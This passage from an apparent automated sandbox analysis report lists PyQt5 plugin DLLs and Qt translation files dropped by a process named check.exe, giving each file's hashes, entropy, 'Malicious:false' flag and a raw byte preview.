                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qjpeg.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):421360
                                                                                                                                                                                                                                      Entropy (8bit):5.7491063936821405
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:USgOWz1eW38u9tyh6fpGUasBKTrsXWwMmH1l3JM5hn0uEfB4:USPQTnastBRB4
                                                                                                                                                                                                                                      MD5:16ABCCEB70BA20E73858E8F1912C05CD
                                                                                                                                                                                                                                      SHA1:4B3A32B166AB5BBBEE229790FDAE9CBC84F936BA
                                                                                                                                                                                                                                      SHA-256:FB4E980CB5FAFA8A4CD4239329AED93F7C32ED939C94B61FB2DF657F3C6AD158
                                                                                                                                                                                                                                      SHA-512:3E5C83967BF31C9B7F1720059DD51AA4338E518B076B0461541C781B076135E9CB9CBCEB13A8EC9217104517FBCC356BDD3FFACA7956D1C939E43988151F6273
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Iv"...L...L...L..o....L..xM...L..|M...L.......L..xI...L..xH...L..xO...L..gM...L...M...L..gH.?.L..gI...L..gL...L..g....L..gN...L.Rich..L.........PE..d...o._.........." .....b...........i...............................................g....`.............................................t...............@....`.......R..............h...T.......................(.......0...............@............................text....`.......b.................. ..`.rdata..J............f..............@..@.data...8....P.......(..............@....pdata.......`... ...*..............@..@.qtmetad.............J..............@..P.rsrc...@............L..............@..@.reloc...............P..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qsvg.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):32240
                                                                                                                                                                                                                                      Entropy (8bit):5.978149408776758
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:uOVKDlJJVlTuLiMtsKVG7TSdDG9Uf2h4e:hVgJVlTuL/tsKVG7TSQUfre
                                                                                                                                                                                                                                      MD5:C0DE135782FA0235A0EA8E97898EAF2A
                                                                                                                                                                                                                                      SHA1:FCF5FD99239BF4E0B17B128B0EBEC144C7A17DE2
                                                                                                                                                                                                                                      SHA-256:B3498F0A10AC4CB42CF7213DB4944A34594FF36C78C50A0F249C9085D1B1FF39
                                                                                                                                                                                                                                      SHA-512:7BD5F90CCAB3CF50C55EAF14F7EF21E05D3C893FA7AC9846C6CA98D6E6D177263AC5EB8A85A34501BCFCA0DA7F0B6C39769726F4090FCA2231EE64869B81CF0B
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x>...P...P...P..a...P.&vQ...P..rQ...P.&vU...P.&vT...P.&vS...P.kiQ...P...Q.n.P.kiU...P.kiP...P.ki....P.kiR...P.Rich..P.........PE..d......_.........." .....$...B......D)....................................................`.........................................PU..t....U..........@............b...............G..T....................I..(...PH..0............@..(............................text....".......$.................. ..`.rdata...+...@...,...(..............@..@.data...8....p.......T..............@....pdata...............V..............@..@.qtmetad.............Z..............@..P.rsrc...@............\..............@..@.reloc...............`..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qtga.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):31728
                                                                                                                                                                                                                                      Entropy (8bit):5.865766652452823
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:1lGALluUEAQATWQ79Z2Y8Ar+dDG2vUf2hF:TZl/EH8WQ794Y8Ar+hvUfm
                                                                                                                                                                                                                                      MD5:A913276FA25D2E6FD999940454C23093
                                                                                                                                                                                                                                      SHA1:785B7BC7110218EC0E659C0E5ACE9520AA451615
                                                                                                                                                                                                                                      SHA-256:5B641DEC81AEC1CF7AC0CCE9FC067BB642FBD32DA138A36E3BDAC3BB5B36C37A
                                                                                                                                                                                                                                      SHA-512:CEBE48E6E6C5CDF8FC339560751813B8DE11D2471A3DAB7D648DF5B313D85735889D4E704E8EEC0AD1084AB43BE0EBDFBACD038AEAC46D7A951EFB3A7CE838EB
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F ._'N._'N._'N.V_.Y'N..HO.]'N.KLO.]'N..HK.M'N..HJ.W'N..HM.\'N..WO.Z'N._'O.4'N..WK.\'N..WN.^'N..W..^'N..WL.^'N.Rich_'N.........................PE..d......_.........." ....."...@.......'..............................................7.....`..........................................W..t...dX..........@.......`....`..............(I..T....................J..(....I..0............@..h............................text...[!.......".................. ..`.rdata...)...@...*...&..............@..@.data........p.......P..............@....pdata..`............T..............@..@.qtmetadu............X..............@..P.rsrc...@............Z..............@..@.reloc...............^..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qtiff.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):390128
                                                                                                                                                                                                                                      Entropy (8bit):5.724665470266677
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:V0jqHiFBaRe0GPAKwP15e7xrEEEEEEN024Rx/3tkYiHUASQbs/l7OanYoOgyV:0qqwP15bx/q7/yyV
                                                                                                                                                                                                                                      MD5:9C0ACF12D3D25384868DCD81C787F382
                                                                                                                                                                                                                                      SHA1:C6E877ABA3FB3D2F21D86BE300E753E23BB0B74E
                                                                                                                                                                                                                                      SHA-256:825174429CED6B3DAB18115DBC6C9DA07BF5248C86EC1BD5C0DCAECA93B4C22D
                                                                                                                                                                                                                                      SHA-512:45594FA3C5D7C4F26325927BB8D51B0B88E162E3F5E7B7F39A5D72437606383E9FDC8F83A77F814E45AFF254914514AE52C1D840A6C7B98767F362ED3F4FC5BD
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....................E....q............q......q......q......<.............<......<......<......<.)....<......Rich....................PE..d......_.........." .....(..........D-.......................................0............`.............................................t...4...........@........%........... ..(....d..T................... f..(....d..0............@..0............................text....&.......(.................. ..`.rdata...v...@...x...,..............@..@.data...(...........................@....pdata...%.......&..................@..@.qtmetad............................@..P.rsrc...@...........................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qwbmp.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):30192
                                                                                                                                                                                                                                      Entropy (8bit):5.938644231596902
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:768:EfEM3S46JE2X/xBZ76pC5J6GdDGZUf2h4:63S3JE2PHZ76pC5J6GEUfn
                                                                                                                                                                                                                                      MD5:68919381E3C64E956D05863339F5C68C
                                                                                                                                                                                                                                      SHA1:CE0A2AD1F1A46B61CB298CEC5AA0B25FF2C12992
                                                                                                                                                                                                                                      SHA-256:0F05969FB926A62A338782B32446EA3E28E4BFBFFC0DBD25ED303FAB3404ABAC
                                                                                                                                                                                                                                      SHA-512:6222A3818157F6BCD793291A6C0380EF8C6B93ECEA2E0C9A767D9D9163461B541AFAF8C6B21C5A020F01C95C6EE9B2B74B358BA18DA120F520E87E24B20836AA
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........]...<.I.<.I.<.I.D%I.<.I.S.H.<.I.W.H.<.I.S.H.<.I.S.H.<.I.S.H.<.IYL.H.<.I.<.I.<.IYL.H.<.IYL.H.<.IYLII.<.IYL.H.<.IRich.<.I........PE..d......_.........." ..... ...8.......'....................................................`......................................... D..t....D..........@....p..T....Z...............6..T...................p8..(...@7..0............0..p............................text............ .................. ..`.rdata..d&...0...(...$..............@..@.data........`.......L..............@....pdata..T....p.......N..............@..@.qtmetad~............R..............@..P.rsrc...@............T..............@..@.reloc...............X..............@..B........................................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\imageformats\qwebp.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):510448
                                                                                                                                                                                                                                      Entropy (8bit):6.605517748735854
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:bPTjgdqdsvh+LrLrLrL5/y4DVHAsqx3hXS+oPZQqRaYG:jT5sMLrLrLrL5q4dAsaOFo
                                                                                                                                                                                                                                      MD5:308E4565C3C5646F9ABD77885B07358E
                                                                                                                                                                                                                                      SHA1:71CB8047A9EF0CDB3EE27428726CACD063BB95B7
                                                                                                                                                                                                                                      SHA-256:6E37ACD0D357871F92B7FDE7206C904C734CAA02F94544DF646957DF8C4987AF
                                                                                                                                                                                                                                      SHA-512:FFAEECFAE097D5E9D1186522BD8D29C95CE48B87583624EB6D0D52BD19E36DB2860A557E19F0A05847458605A9A540C2A9899D53D36A6B7FD5BF0AD86AF88124
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................a....s........s......s......s....>.........>......>.....>....>......>....Rich...................PE..d......_.........." .....B..........tH.......................................0......`q....`..........................................W..t....W..........@.......0H........... ......h...T.......................(.......0............`...............................text...[@.......B.................. ..`.rdata..J....`.......F..............@..@.data....'...........X..............@....pdata..0H.......J...\..............@..@.qtmetadv...........................@..P.rsrc...@...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qminimal.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):844784
                                                                                                                                                                                                                                      Entropy (8bit):6.625808732261156
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:y6MhioHKQ1ra8HT+bkMY8zKI4kwU7dFOTTYfEWmTxbwTlWc:BMhioHKQp+bkjAjwGdFSZtbwBd
                                                                                                                                                                                                                                      MD5:2F6D88F8EC3047DEAF174002228219AB
                                                                                                                                                                                                                                      SHA1:EB7242BB0FE74EA78A17D39C76310A7CDD1603A8
                                                                                                                                                                                                                                      SHA-256:05D1E7364DD2A672DF3CA44DD6FD85BED3D3DC239DCFE29BFB464F10B4DAA628
                                                                                                                                                                                                                                      SHA-512:0A895BA11C81AF14B5BD1A04A450D6DCCA531063307C9EF076E9C47BD15F4438837C5D425CAEE2150F3259691F971D6EE61154748D06D29E4E77DA3110053B54
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........#\..B2..B2..B2..:...B2..-3..B2.F....B2..-7..B2..-6..B2..-1..B2..)6..B2.^23..B2..)3..B2..B3.@2.^26..B2.^27..B2.^22..B2.^2...B2.^20..B2.Rich.B2.........PE..d...N._.........." ......................................................... ............`......................................... ...x.......@.......H....`..H.......................T.......................(.......0...............(............................text...;........................... ..`.rdata...C.......D..................@..@.data...H....@......."..............@....pdata..H....`.......0..............@..@.qtmetad............................@..P.rsrc...H...........................@..@.reloc..............................@..B................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qoffscreen.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):754672
                                                                                                                                                                                                                                      Entropy (8bit):6.6323155845799695
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12288:/HpBmyVIRZ3Tck83vEgex5aebusGMIlhLfEWmpCJkl:/HpB63TckUcLaHMITAZmW
                                                                                                                                                                                                                                      MD5:6407499918557594916C6AB1FFEF1E99
                                                                                                                                                                                                                                      SHA1:5A57C6B3FFD51FC5688D5A28436AD2C2E70D3976
                                                                                                                                                                                                                                      SHA-256:54097626FAAE718A4BC8E436C85B4DED8F8FB7051B2B9563A29AEE4ED5C32B7B
                                                                                                                                                                                                                                      SHA-512:8E8ABB563A508E7E75241B9720A0E7AE9C1A59DD23788C74E4ED32A028721F56546792D6CCA326F3D6AA0A62FDEDC63BF41B8B74187215CD3B26439F40233F4D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m..T..KT..KT..K]t7K@..K.c.JV..K@g.JV..K.cKU..K.c.JA..K.c.J\..K.c.JP..K.|.JQ..KT..K...K.|.Js..K.|.JS..K.|.JU..K.|[KU..K.|.JU..KRichT..K........PE..d...R._.........." ................L.....................................................`.............................................x...8...........H....... s...h..........p.......T................... ...(.......0...............@............................text............................... ..`.rdata..............................@..@.data...............................@....pdata.. s.......t..................@..@.qtmetad.............T..............@..P.rsrc...H............V..............@..@.reloc..p............Z..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qwebgl.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):482288
                                                                                                                                                                                                                                      Entropy (8bit):6.152380961313931
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:6144:WO/vyK+DtyaHlIMDhg5WEOvAwKB2VaaHeqRw/yVfYu4UnCA6DEjeYchcD+1Zy2:bKtHOWg5OvAwK0NYu4AShcD+1U2
                                                                                                                                                                                                                                      MD5:1EDCB08C16D30516483A4CBB7D81E062
                                                                                                                                                                                                                                      SHA1:4760915F1B90194760100304B8469A3B2E97E2BC
                                                                                                                                                                                                                                      SHA-256:9C3B2FA2383EEED92BB5810BDCF893AE30FA654A30B453AB2E49A95E1CCF1631
                                                                                                                                                                                                                                      SHA-512:0A923495210B2DC6EB1ACEDAF76D57B07D72D56108FD718BD0368D2C2E78AE7AC848B90D90C8393320A3D800A38E87796965AFD84DA8C1DF6C6B244D533F0F39
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........gM..#...#...#..~....#.ei&...#.ei'...#.ei ...#..m'...#.ei"...#.(v"...#..m"...#..."...#.(v&...#.(v#...#.(v...#.(v!...#.Rich..#.................PE..d......_.........." .....R...........;....................................................`..........................................m..t...Dn..T.......@....@...=...@..............0...T.......................(.......0............p..(............................text...{Q.......R.................. ..`.rdata..:....p.......V..............@..@.data...H....0......................@....pdata...=...@...>..................@..@.qtmetadz............2..............@..P.rsrc...@............4..............@..@.reloc...............8..............@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platforms\qwindows.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):1477104
                                                                                                                                                                                                                                      Entropy (8bit):6.575113537540671
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24576:4mCSPJrAbXEEuV9Hw2SoYFo3HdxjEgqJkLdLu5qpmZuhg/A2b:nPlIEEuV9Hw2SFFWHdWZsdmqja/A2b
                                                                                                                                                                                                                                      MD5:4931FCD0E86C4D4F83128DC74E01EAAD
                                                                                                                                                                                                                                      SHA1:AC1D0242D36896D4DDA53B95812F11692E87D8DF
                                                                                                                                                                                                                                      SHA-256:3333BA244C97264E3BD19DB5953EFA80A6E47AACED9D337AC3287EC718162B85
                                                                                                                                                                                                                                      SHA-512:0396BCCDA43856950AFE4E7B16E0F95D4D48B87473DC90CF029E6DDFD0777E1192C307CFE424EAE6FB61C1B479F0BA1EF1E4269A69C843311A37252CF817D84D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......i...-...-...-...$.%.9.....q.,......8......%......)......+...9......9..,......)..........9..8...-..........d......,.....I.,......,...Rich-...........PE..d....._.........." .....,...h......4+..............................................n.....`.............................................x...(...........H............n..........X....r..T...................Pt..(... s..0............@...5...........................text..._+.......,.................. ..`.rdata.......@.......0..............@..@.data....m...@...D...(..............@....pdata...............l..............@..@.qtmetad.............J..............@..P.rsrc...H............L..............@..@.reloc..X............P..............@..B........................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\platformthemes\qxdgdesktopportal.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):68592
                                                                                                                                                                                                                                      Entropy (8bit):6.125954940500008
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:1536:Nt4B1RLj3S6TtH2sweUH+Hz6/4+D6VFsfvUfO:AB1RHFdoeUs6/4O6VFSZ
                                                                                                                                                                                                                                      MD5:F66F6E9EDA956F72E3BB113407035E61
                                                                                                                                                                                                                                      SHA1:97328524DA8E82F5F92878F1C0421B38ECEC1E6C
                                                                                                                                                                                                                                      SHA-256:E23FBC1BEC6CEEDFA9FD305606A460D9CAC5D43A66D19C0DE36E27632FDDD952
                                                                                                                                                                                                                                      SHA-512:7FF76E83C8D82016AB6BD349F10405F30DEEBE97E8347C6762EB71A40009F9A2978A0D8D0C054CF7A3D2D377563F6A21B97DDEFD50A9AC932D43CC124D7C4918
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+...o...o...o...f...k......m...{..m......~......h......m......h...o..........k......n.....~.n......n...Richo...........................PE..d...V._.........." .....z...t......T........................................@.......b....`......................................... ................ ..X....................0..4.......T.......................(...p...0...............x............................text....y.......z.................. ..`.rdata...Z.......\...~..............@..@.data...............................@....pdata..............................@..@.qtmetad............................@..P.rsrc...X.... ......................@..@.reloc..4....0......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\plugins\styles\qwindowsvistastyle.dll

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):144368
                                                                                                                                                                                                                                      Entropy (8bit):6.294675868932723
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3072:rrjwZ43rCOtrBk7wcR0l7wBlaL6BtIEt51T0Nhkqg8FoQY:7hZu9R0l7wFBtIEt51T0Nuqg8JY
                                                                                                                                                                                                                                      MD5:53A85F51054B7D58D8AD7C36975ACB96
                                                                                                                                                                                                                                      SHA1:893A757CA01472A96FB913D436AA9F8CFB2A297F
                                                                                                                                                                                                                                      SHA-256:D9B21182952682FE7BA63AF1DF24E23ACE592C35B3F31ECEEF9F0EABEB5881B9
                                                                                                                                                                                                                                      SHA-512:35957964213B41F1F21B860B03458404FBF11DAF03D102FBEA8C2B2F249050CEFBB348EDC3F22D8ECC3CB8ABFDC44215C2DC9DA029B4F93A7F40197BD0C16960
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R._...1]..1]..1]..]..1]..0\..1]..5\..1]..2\..1]..4\..1]..0\..1]..0\..1]..0]..1]..4\..1]..1\..1]...]..1]..3\..1]Rich..1]........................PE..d...`._.........." .....\...........`.......................................`......wJ....`................................................. ........@..X.... ...............P.........T...................`...(...0...0............p...............................text....Z.......\.................. ..`.rdata......p.......`..............@..@.data...............................@....pdata....... ......................@..@.qtmetadm....0......................@..P.rsrc...X....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_ar.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):130
                                                                                                                                                                                                                                      Entropy (8bit):4.024232093209084
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/2/vlAlHekW3/S1MUe3/CLlI+rwtbWlMrNtYs8ar/u:Cwm+/PtUePCRIRt6Ygs8y/u
                                                                                                                                                                                                                                      MD5:8FF05B56C0995F90A80B7064AA6E915C
                                                                                                                                                                                                                                      SHA1:D5AEB09AE557CEEFB758972EC4AC624CDDC9E6A7
                                                                                                                                                                                                                                      SHA-256:A8A1B0D6F958E7366D1C856BE61000106D3E7FC993FB931675369892B9002D0B
                                                                                                                                                                                                                                      SHA-512:5374E0F1D3F5A6A456B00732DE8005787B17ECEF9C8A2B2C1228966A6A8DE211700334D8FD789DAD269F52D0AEED3F5160010CA60909861E270C253B3EA881A4
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ar....R.....q.t.b.a.s.e._.a.r.....q.t.s.c.r.i.p.t._.a.r.....q.t.m.u.l.t.i.m.e.d.i.a._.a.r..............$...*.

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_bg.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.6813848812976975
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/6lLlAlHekVYtzlY1MUdI7lULlI+rwtbWlMoIFl8IPldkO4t/z:CwDC+7tJjUWhURIRt68f8oiP1z
                                                                                                                                                                                                                                      MD5:466EED6C184D2055488D4C5EA9AE5F20
                                                                                                                                                                                                                                      SHA1:8599AB9B731BFC84F6EEC7A0129F396FB8FEC4EA
                                                                                                                                                                                                                                      SHA-256:9E1CE4D91852352043D9191F1A992838F919CBA7E2F2D9BB1161E494E8BF5F5E
                                                                                                                                                                                                                                      SHA-512:D2462951EC7DCE3D0851AE9C4ED644FFE0D2A5BDD15B4AE1A4295C187B4295BC854D6A5038DAC0564D165463419D615EB6CE7A9760CEFAD71AB673FB2109C349
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......bg....v.....q.t.b.a.s.e._.b.g.....q.t.s.c.r.i.p.t._.b.g.....q.t.m.u.l.t.i.m.e.d.i.a._.b.g... .q.t.x.m.l.p.a.t.t.e.r.n.s._.b.g.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_ca.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):153
                                                                                                                                                                                                                                      Entropy (8bit):3.631479835393124
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
                                                                                                                                                                                                                                      MD5:6FBA66FE449866B478A2EBA66A724A02
                                                                                                                                                                                                                                      SHA1:EBEF6ED8460218CE8DF735659A8CBCD693600AC6
                                                                                                                                                                                                                                      SHA-256:171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
                                                                                                                                                                                                                                      SHA-512:2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......

                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\_MEI27922\PyQt5\Qt5\translations\qt_cs.qm

                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\UvDdFNOw\check.exe
                                                                                                                                                                                                                                      File Type:Qt Translation file
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):157
                                                                                                                                                                                                                                      Entropy (8bit):3.7483537099309427
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
                                                                                                                                                                                                                                      MD5:D033053C03C3ECFA2AA926E0E674F67F
                                                                                                                                                                                                                                      SHA1:B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
                                                                                                                                                                                                                                      SHA-256:3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
                                                                                                                                                                                                                                      SHA-512:2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
